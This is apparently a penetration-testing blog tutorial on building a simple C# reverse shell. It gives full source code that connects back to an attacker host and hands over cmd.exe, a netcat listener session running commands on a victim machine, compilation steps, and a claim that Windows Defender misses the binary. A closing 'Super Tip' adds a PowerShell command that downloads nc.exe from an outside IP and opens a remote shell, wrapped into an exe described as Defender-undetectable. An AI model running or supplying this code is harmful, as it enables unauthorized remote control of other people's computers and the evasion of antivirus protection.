C# Simple Reverse Shell

C# Simple Reverse Shell Code writing

Looking on github there are many examples of C# code that open reverse shells via cmd.exe. In this case i copied part of the codes and used the following simple C# program. No evasion, no persistence, no hiding code, only simple “open socket and launch the cmd.exe on victim machine”:

using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;


namespace ConnectBack
{
	public class Program
	{
		static StreamWriter streamWriter;

		public static void Main(string[] args)
		{
			using(TcpClient client = new TcpClient("10.0.2.15", 443))
			{
				using(Stream stream = client.GetStream())
				{
					using(StreamReader rdr = new StreamReader(stream))
					{
						streamWriter = new StreamWriter(stream);
						
						StringBuilder strInput = new StringBuilder();

						Process p = new Process();
						p.StartInfo.FileName = "cmd.exe";
						p.StartInfo.CreateNoWindow = true;
						p.StartInfo.UseShellExecute = false;
						p.StartInfo.RedirectStandardOutput = true;
						p.StartInfo.RedirectStandardInput = true;
						p.StartInfo.RedirectStandardError = true;
						p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
						p.Start();
						p.BeginOutputReadLine();

						while(true)
						{
							strInput.Append(rdr.ReadLine());
							//strInput.Append("\n");
							p.StandardInput.WriteLine(strInput);
							strInput.Remove(0, strInput.Length);
						}
					}
				}
			}
		}

		private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)
        {
            StringBuilder strOutput = new StringBuilder();

            if (!String.IsNullOrEmpty(outLine.Data))
            {
                try
                {
                    strOutput.Append(outLine.Data);
                    streamWriter.WriteLine(strOutput);
                    streamWriter.Flush();
                }
                catch (Exception err) { }
            }
        }

	}
}
Simple Reverse shell C# code

root@kali:~# nc -lvp 443
listening on [any] 443 ...
Kali Linux in listening mode

I put my kali in listening mode on 443 port with netcat, compiled and executed my code.

Scan the exe file with no Threats found

As you can see the .exe file is clean for Windows Defender. From AV side no malicious actions ware already performed. This could be a standard results.

file execution on victim machine

Executing file the cmd instance is visible to the user and if the prompt window will be closed the same will happen for the shell.

root@kali:~# nc -lvp 443
listening on [any] 443 ...
192.168.178.14: inverse host lookup failed: Unknown host
connect to [192.168.178.16] from (UNKNOWN) [192.168.178.14] 25852
Microsoft Windows [Version 10.0.17134.523]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\PENTEST>
C:\PENTEST>whoami
lt-jacco\jacco
Running reconnaissance commands on victim machine from Kali Linux

Running the exe file will spawn immediately the shell on my Kali.

Finding the C# compiler (csc.exe)

dir /s %WINDIR%\CSC.EXE

Compiling

c:\PENTEST>c:\windows\Microsoft.NET\Framework\v3.5\csc.exe /t:exe /out:Simple_Rev_Shell443.exe Simple_Rev_Shell443.cs
Microsoft (R) Visual C# 2008 Compiler version 3.5.30729.8931
for Microsoft (R) .NET Framework version 3.5
Copyright (C) Microsoft Corporation. All rights reserved.

Simple_Rev_Shell443.cs(64,34): warning CS0168: The variable 'err' is declared but never used

c:\PENTEST>dir Simple_Rev_Shell443.*
Volume in drive C is Boot
Volume Serial Number is 9488-7836

Directory of c:\PENTEST

09/02/2019 19:45 1.822 Simple_Rev_Shell443.cs
10/02/2019 10:27 5.120 Simple_Rev_Shell443.exe
2 File(s) 6.942 bytes
0 Dir(s) 6.854.045.696 bytes free

reference used : https://github.com/itaykrk/CSharp-reverse-tcp

Not for this, but if compiling saftykatz32.exe Why do I get the following error? Unsafe code may only appear if compiling with /unsafe”?vI work in C# and Visual Studio 2015 for programming on Windows .

To use unsafe code blocks, the project has to be compiled with the /unsafe switch on.

Open the properties for the project, go to the Build tab and check the Allow unsafe codecheckbox.

Or use below :

Super Tip : https://www.battoexeconverter.com/ use it to convert puckie.bat [ containing : powershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://31.21.73.15/nc.exe','nc.exe')"; Start-Process nc.exe -NoNewWindow -Argumentlist '31.21.73.15 53 -e cmd.exe' ] to puckie.exe -> and you have an Defender undetectable exe file to create a remote shell !!!

Battoexeconverter (https://battoexeconverter.com/)
Flawlessly compile Batch Files to .EXE that work on all Windows versions, configurations and languages. Extra powerful commands and Graphics.
Advanced BAT to EXE Converter v4.11 - Official Site - Compile batch files to .EXE with Extra commands and Graphics

Author : Jacco Straathof